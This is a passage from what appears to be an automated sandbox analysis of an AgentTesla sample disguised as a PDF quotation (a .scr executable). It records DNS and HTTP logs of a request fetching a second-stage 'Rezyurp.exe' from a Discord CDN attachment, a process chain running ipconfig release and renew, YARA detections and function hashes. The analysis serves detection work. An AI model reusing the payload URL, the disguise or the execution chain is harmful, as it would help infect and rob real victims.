Sep 19, 2023 18:56:18.506567955 CEST	53	64997	8.8.8.8	192.168.2.5
Sep 19, 2023 18:56:18.737102032 CEST	62449	53	192.168.2.5	8.8.8.8
Sep 19, 2023 18:56:18.844629049 CEST	53	62449	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2023 18:56:18.406034946 CEST	192.168.2.5	8.8.8.8	0xd884	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.737102032 CEST	192.168.2.5	8.8.8.8	0x2f46	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 19, 2023 18:56:18.506567955 CEST	8.8.8.8	192.168.2.5	0xd884	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.506567955 CEST	8.8.8.8	192.168.2.5	0xd884	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.506567955 CEST	8.8.8.8	192.168.2.5	0xd884	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.506567955 CEST	8.8.8.8	192.168.2.5	0xd884	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.506567955 CEST	8.8.8.8	192.168.2.5	0xd884	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.844629049 CEST	8.8.8.8	192.168.2.5	0x2f46	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.844629049 CEST	8.8.8.8	192.168.2.5	0x2f46	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.844629049 CEST	8.8.8.8	192.168.2.5	0x2f46	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.844629049 CEST	8.8.8.8	192.168.2.5	0x2f46	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Sep 19, 2023 18:56:18.844629049 CEST	8.8.8.8	192.168.2.5	0x2f46	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49739	162.159.134.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49738	162.159.129.233	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 19, 2023 18:56:18.607820988 CEST	594	OUT	GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: cdn.discordapp.com Connection: Keep-Alive
Sep 19, 2023 18:56:18.727654934 CEST	595	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 19 Sep 2023 16:56:18 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 19 Sep 2023 17:56:18 GMT Location: https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=Ux.FURtVSo7pDjsB8lE3VbpgTq1BNM2LsUXCfiE8kFk-1695142578-0-ATjkGexIrGfc6AIqke4jkedsana+o2CW9PjGmcmt8VkBjwm7H9RkJlfVOvnRQvQb0CEaptYs3AMk0/jeFDoOyWg=; path=/; expires=Tue, 19-Sep-23 17:26:18 GMT; domain=.discordapp.com; HttpOnly; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t8mEe9ShvKOxhR6ArnD01VETAgv51sXBNEEXdzU%2Bs0%2FUsBh1s4JL2z%2F9Fal5SPIfDd85JsShPY1cUWraKgo2OE7ldfVPdn07cGFt1C34YEFb3rzQ%2BuHtvwfG4FSMemUtj4Nlag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80935c7c8eea0cac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49739	162.159.134.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-19 16:56:19 UTC	0	OUT	GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: cdn.discordapp.com Connection: Keep-Alive
2023-09-19 16:56:19 UTC	0	IN	HTTP/1.1 404 Not Found Date: Tue, 19 Sep 2023 16:56:19 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 233 Connection: close CF-Ray: 80935c801e2e0f70-EWR CF-Cache-Status: EXPIRED Cache-Control: public, max-age=31536000 Content-Disposition: attachment Expires: Wed, 18 Sep 2024 16:56:19 GMT Vary: Accept-Encoding Alt-Svc: h3=":443"; ma=86400 X-GUploader-UploadID: ADPycdttIlLS4DZPGnjapuaH4IH3h668kquNljQgZPe-fWubTgvAhUkGio3FmEEev5-vR5BdzhXy8itN-sa7_uEXH7GJbQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=0RkfxpWOthSR_M4WX33SHnxwmq.PBBz9w0zzi7FHLsg-1695142579-0-AbG8MuU4t6NFaTnWZGcHy6rJMbIrxRbtsDbFI2DYzZgwas/LDld+g9kZ0Nn+nm46+7YCJcqPskzXzbnlxNokCb4=; path=/; expires=Tue, 19-Sep-23 17:26:19 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BVW9qS5olmBj5R6Wb%2BCqDqCDRUwHQy%2FmOBfXJJf5%2BA8ozfXJWPynWbtxvILTsSuLa9ycp9uR2KzoHr2ZzAOSX7wp3cbuwl3cEK2Lt341mSp1M4jseh03HjHOulGoipmwrvFLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2023-09-19 16:56:19 UTC	1	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 35 32 31 36 34 31 37 32 35 36 36 36 33 30 34 32 31 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1152164172566630421
2023-09-19 16:56:19 UTC	1	IN	Data Raw: 2f 31 31 35 33 35 36 34 37 30 33 37 39 33 31 30 37 30 33 36 2f 52 65 7a 79 75 72 70 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e Data Ascii: /1153564703793107036/Rezyurp.exe</Details></Error>

Target ID:	0
Start time:	18:55:40
Start date:	19/09/2023
Path:	C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Imagebase:	0xe80000
File size:	672'768 bytes
MD5 hash:	A4BE5E5C00EC493498B67AE5C2FD2D04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383676188.0000000004476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003462000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:55:41
Start date:	19/09/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /release
Imagebase:	0xc60000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:55:41
Start date:	19/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72b0e0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:55:41
Start date:	19/09/2023
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /release
Imagebase:	0xa40000
File size:	29'184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:56:11
Start date:	19/09/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /renew
Imagebase:	0xc60000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:56:11
Start date:	19/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff72b0e0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:56:12
Start date:	19/09/2023
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /renew
Imagebase:	0xa40000
File size:	29'184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:56:17
Start date:	19/09/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xfd0000
File size:	102'568 bytes
MD5 hash:	4DF5F963C7E18F062E49870D0AFF8F6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	41.5%
Total number of Nodes:	53
Total number of Limit Nodes:	4

Executed Functions

Function 05C0E108 Relevance: 3.1, Strings: 2, Instructions: 640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(4q, xrefs: 05C0E4C1
f5q, xrefs: 05C0E77D

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: f5q$(4q
API String ID: 0-1535645079
Opcode ID: c93e6f7cabd6ab8e54bf860bb1ae234af9fd49e031f5bcd9546d74619dc0b0c3
Instruction ID: 92e491a697f645f1c577bdfa3e0f00295b9ee4c4cc9763a843f36d852a9384c6
Opcode Fuzzy Hash: c93e6f7cabd6ab8e54bf860bb1ae234af9fd49e031f5bcd9546d74619dc0b0c3
Instruction Fuzzy Hash: EB22EF317043158FCB25DB69D49466ABBFBFFC5210B189D6EE14AC7B85DB31E8028B90

Uniqueness

Uniqueness Score: -1.00%

Function 05C013A8 Relevance: 3.1, Strings: 2, Instructions: 558
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$0q, xrefs: 05C01676
Pl0q, xrefs: 05C01590

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: Pl0q$$0q
API String ID: 0-4031184341
Opcode ID: 5166b828899e1ca02b69c53d92fb201fbb67d7065f0fa6d8b68cd47fb3db678a
Instruction ID: 4ea743b4d041ac31e93e7e320f1dfd408263cab92f6097832bcac6a09a061f5c
Opcode Fuzzy Hash: 5166b828899e1ca02b69c53d92fb201fbb67d7065f0fa6d8b68cd47fb3db678a
Instruction Fuzzy Hash: 25224834B002058FCB14DF69C984A6ABBF6FF89710B1998A9E506DB3B1DB31ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05C812A0 Relevance: .5, Instructions: 547COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b544ab18eac2be3fc97f91852e8e5d9f7b87a385d65aec08580334d661d075
Instruction ID: f27ed7557a0364c6d06c560428767dd5da1c8783f889a2647907c2f7d8e82a4b
Opcode Fuzzy Hash: 44b544ab18eac2be3fc97f91852e8e5d9f7b87a385d65aec08580334d661d075
Instruction Fuzzy Hash: 41129035B002159FCB19EBA9C954B6EBBF7FFC8204F298569D406AB394DE319D02C784

Uniqueness

Uniqueness Score: -1.00%

Function 05C812B0 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29dea5ea1e57e5148ca62bacdcbdfc5c3c44a696a2647fd342df6fa15d331d6b
Instruction ID: 960c1571f5aa62c8841dea9fc4f980fd101bbd219dd609b15bc5e1436393a2ae
Opcode Fuzzy Hash: 29dea5ea1e57e5148ca62bacdcbdfc5c3c44a696a2647fd342df6fa15d331d6b
Instruction Fuzzy Hash: 25129034B002159FDB19EBA9C954B6EBBF7BFC8704F298529D406AB394DE319D02C784

Uniqueness

Uniqueness Score: -1.00%

Function 05C07F70 Relevance: 4.3, Strings: 3, Instructions: 561
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 05C083DE
(4q, xrefs: 05C084A2
XR5q, xrefs: 05C080F3

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: $(4q$XR5q
API String ID: 0-3406074314
Opcode ID: 146f20c179f2193360f8e1e64981c357b23d655b08171534b452f1b9447345c4
Instruction ID: 1d0149f98c0861750f27e83638ac72430e7f5917ab108023c24175b576311e91
Opcode Fuzzy Hash: 146f20c179f2193360f8e1e64981c357b23d655b08171534b452f1b9447345c4
Instruction Fuzzy Hash: E12232797145108FCB58DB29C898A297BF2FF89715B2598A9E506CF3B1CB31ED42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 05C03878 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H4q, xrefs: 05C03D7C
H4q, xrefs: 05C03D4D
H4q, xrefs: 05C03DCC

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: H4q$H4q$H4q
API String ID: 0-4271027141
Opcode ID: 60a7f684203a448f417b968632ec04bbc049d490c74d3a1103d0c5774d9687ef
Instruction ID: 7e2f1b1d2586107ec4d635972719990d27167f37620d1ab7249406a56be1eb95
Opcode Fuzzy Hash: 60a7f684203a448f417b968632ec04bbc049d490c74d3a1103d0c5774d9687ef
Instruction Fuzzy Hash: A8126F35A102059FCB25DFA9C594A6EBBF2FF88700F14892DD4069B3A4DB35ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C05528 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'0q, xrefs: 05C058A1
4'0q, xrefs: 05C05742
4'0q, xrefs: 05C05821

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q$4'0q$4'0q
API String ID: 0-2797774833
Opcode ID: da15abeac484cb1d2fd3e88494096b27b122f4dfc129f388be3697f7ccc07f16
Instruction ID: d16c9e16bc760daec3cc4671a6d1b73c42255a13618b312255428508192b32b4
Opcode Fuzzy Hash: da15abeac484cb1d2fd3e88494096b27b122f4dfc129f388be3697f7ccc07f16
Instruction Fuzzy Hash: E7F1DA34A10218DFCB18DFA4D998A9DBBB2FF88300F559558E406AB3A5CB75EC42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05C00040 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$0q, xrefs: 05C003AB
$0q, xrefs: 05C003BB

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: $0q$$0q
API String ID: 0-2062176166
Opcode ID: f2ef95ee64b2c208c50d3ae7bbe1b8af77592d2bdd837aa55c90a4ecf2eeed06
Instruction ID: c58a496ed2fe301db1759060bc865cbe5735a566a846c70c4d841d5dd17a7015
Opcode Fuzzy Hash: f2ef95ee64b2c208c50d3ae7bbe1b8af77592d2bdd837aa55c90a4ecf2eeed06
Instruction Fuzzy Hash: 60226A74A042198FCB15CFA5D858BBEBBB6FF48304F559459E801A7290DB34AE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 059A0078 Relevance: 2.9, Strings: 2, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'0q, xrefs: 059A04ED
4'0q, xrefs: 059A04E1

Memory Dump Source

Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q$4'0q
API String ID: 0-2150913031
Opcode ID: 6b349f91ec40aef30ae52fb86782f0855661a537e26f5f2fb4801a98632cbc4c
Instruction ID: 5931c9dabab420ef4c76b634af9efb99391b2f4a450d378b21ed1b16f2c4c5eb
Opcode Fuzzy Hash: 6b349f91ec40aef30ae52fb86782f0855661a537e26f5f2fb4801a98632cbc4c
Instruction Fuzzy Hash: 01B17632B152128BCF36596A856D73A69DBBFC5A50B54443ED90ACB244EF718C43C3F2

Uniqueness

Uniqueness Score: -1.00%

Function 05C02F28 Relevance: 2.8, Strings: 2, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(4q, xrefs: 05C02F3C
d, xrefs: 05C03189

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q$d
API String ID: 0-685716487
Opcode ID: 637ad4175c573ac24800267e843a38542b02e36814147f0877bb13934a9bea89
Instruction ID: 10f85539c91fbbed5e05830c2df64a8524b512a725f8d89e86afcc1fd6421173
Opcode Fuzzy Hash: 637ad4175c573ac24800267e843a38542b02e36814147f0877bb13934a9bea89
Instruction Fuzzy Hash: 50D185346006069FCB24DF28C58496ABBF2FF89710B258969D45A9B3A1DB31FD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C01C28 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(4q, xrefs: 05C01D4C
(4q, xrefs: 05C01DA3

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q$(4q
API String ID: 0-375554967
Opcode ID: 6c2ea88ded3ecec5ee39012a3dabee2fc73dec28c3eae9e535d7152534124ba9
Instruction ID: f6e4980e4006ae9abe7be2f9c18e922717632223fe66559f0c4c63e22059bffb
Opcode Fuzzy Hash: 6c2ea88ded3ecec5ee39012a3dabee2fc73dec28c3eae9e535d7152534124ba9
Instruction Fuzzy Hash: 5151E1363142458FCB16DF28D858AAE7BE2FF84314B14856AE805CB3E5CB36DD16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 059A06E8 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'0q, xrefs: 059A089D
4'0q, xrefs: 059A0891

Memory Dump Source

Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q$4'0q
API String ID: 0-2150913031
Opcode ID: 0da7b789ca0061725aa36471c4a54c9bedc1423224f06bf5877dc25d00a69503
Instruction ID: 813b83850c59c9ef74f69f5c901e2c5f103a2c1bf3689e67b9b14869bbd72a38
Opcode Fuzzy Hash: 0da7b789ca0061725aa36471c4a54c9bedc1423224f06bf5877dc25d00a69503
Instruction Fuzzy Hash: 4941B136B262114B4B3BA62E00AC53F25DBBFD55507494D2EC84BD7384DF7A8C02A7E6

Uniqueness

Uniqueness Score: -1.00%

Function 05C0BD08 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(4q, xrefs: 05C0BD56
H4q, xrefs: 05C0BE2C

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q$H4q
API String ID: 0-513182925
Opcode ID: a516560cc5d23e061610828253af2ebfca5353d14e8cfb247cdd8afa5ee503dd
Instruction ID: d95d4fc274f81b2bdb3e91f3896b01caa745ab77e3c2e02a00ffcbf6f0dae782
Opcode Fuzzy Hash: a516560cc5d23e061610828253af2ebfca5353d14e8cfb247cdd8afa5ee503dd
Instruction Fuzzy Hash: 9751F0357106108FCB05DB2CC964A2E7BF2FF86214B1584AAE205DB3E5DB39DD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 059A0520 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'0q, xrefs: 059A06B3
4'0q, xrefs: 059A06A7

Memory Dump Source

Source File: 00000000.00000002.383858801.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: 4'0q$4'0q
API String ID: 0-2150913031
Opcode ID: 264877478b8b3243b6c3b1c2b1c2ba751066b307bde35d6d3c8318bd6bd91ab0
Instruction ID: af49607c40be726f5b9e1156c9ce62988d61d810cd1b3fb999beee351a2733fd
Opcode Fuzzy Hash: 264877478b8b3243b6c3b1c2b1c2ba751066b307bde35d6d3c8318bd6bd91ab0
Instruction Fuzzy Hash: 3341C732B152128BCB36A66B852D77A25DBBFC5654B14462EC906CB384DF71CC02C3F2

Uniqueness

Uniqueness Score: -1.00%

Function 05C06400 Relevance: 1.9, Strings: 1, Instructions: 677
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,4q, xrefs: 05C0677B

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: ,4q
API String ID: 0-2140648754
Opcode ID: c08cdab8cc10dd94f4670f3f8f68fc0d4e73bc94de28d1ad21e3a9dd4f411b27
Instruction ID: 052dcd6b7f2636c02cf11b148bbc411ba84bf77e6ef65e36ab894f88e81c0d1e
Opcode Fuzzy Hash: c08cdab8cc10dd94f4670f3f8f68fc0d4e73bc94de28d1ad21e3a9dd4f411b27
Instruction Fuzzy Hash: EB521B75A102298FCB24CF69C941BDDBBF6BF88300F1584E9E509A7391DA309E81CF61

Uniqueness

